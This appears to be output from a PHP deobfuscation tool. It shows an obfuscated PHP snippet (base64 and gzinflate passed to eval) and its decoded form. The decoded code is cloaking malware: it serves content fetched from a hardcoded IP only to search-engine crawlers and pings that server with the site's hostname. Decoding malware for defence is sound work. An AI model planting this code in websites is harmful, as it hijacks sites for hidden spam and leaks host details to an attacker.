Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* v5e5whgdc7 */$D = "jZDBSgMxEIZfJSzF3UBJul" . "KUWhb" . "1ENuTShq9FAnb7DQJpsmSjaKw..

Decoded Output download

if (preg_match("/googlebot|bing|msn|yahoo|yandex/i", $_SERVER['HTTP_USER_AGENT'])) echo @file_get_contents("http://194.67.211.41/link.php?a=" . urlencode($_GET['article']) . "&h=" . urlencode($_SERVER['HTTP_HOST']) . "&r=" . urlencode($_SERVER['HTTP_REFERER']));if (rand(0,9) == 0) @file_get_contents("http://194.67.211.41/discover.php?h=" . urlencode($_SERVER['HTTP_HOST']));

Did this file decode correctly?

Original Code

<?php /* v5e5whgdc7 */$D = "jZDBSgMxEIZfJSzF3UBJul" . "KUWhb" . "1ENuTShq9FAnb7DQJpsmSjaKwD28" . "seBBBehkY5" . "mf4vt/uU" . "dVH0PLQJmWqguo" . "QtINdSOPOe" . "j0eBj9+tiaEPH0H" . "H9" . "Q" . "WUz" . "SRG8afGd+WayEe5VPe5O2K3YvyBWMEygR0s7" . "cOpIYkVfAJ" . "fBqqwqTUX1FaL" . "+bk4pKc" . "1zWZ19RZ/0p601+3TYEIeosOvAodVBO5YmJ" . "btjFZ5SB/ztfi" . "zPxJ" . "/UJZP2zETzT+H+" . "XsjnHG" . "v5GXNrcQs181my4w" . "aho0w6cbdHZ" . "Q4R3i0eI0Prz8Ag==";$C = "Z3pp" . "bmZsY" . "X" . "R" . "l";$A = "ba" . "se64_" . "dec" . "o" . "de";$u = $A($C);$H = $A($C);$l = $H($A($D));eval($l); ?>

Function Calls

gzinflate 1
base64_decode 3

Variables

$A base64_decode
$C Z3ppbmZsYXRl
$D jZDBSgMxEIZfJSzF3UBJulKUWhb1ENuTShq9FAnb7DQJpsmSjaKwD28seBBB..
$H gzinflate
$l if (preg_match("/googlebot|bing|msn|yahoo|yandex/i", $_SERVE..
$u gzinflate

Stats

MD5 535ddad653f5d132c40e7002fccc79b9
Eval Count 1
Decode Time 168 ms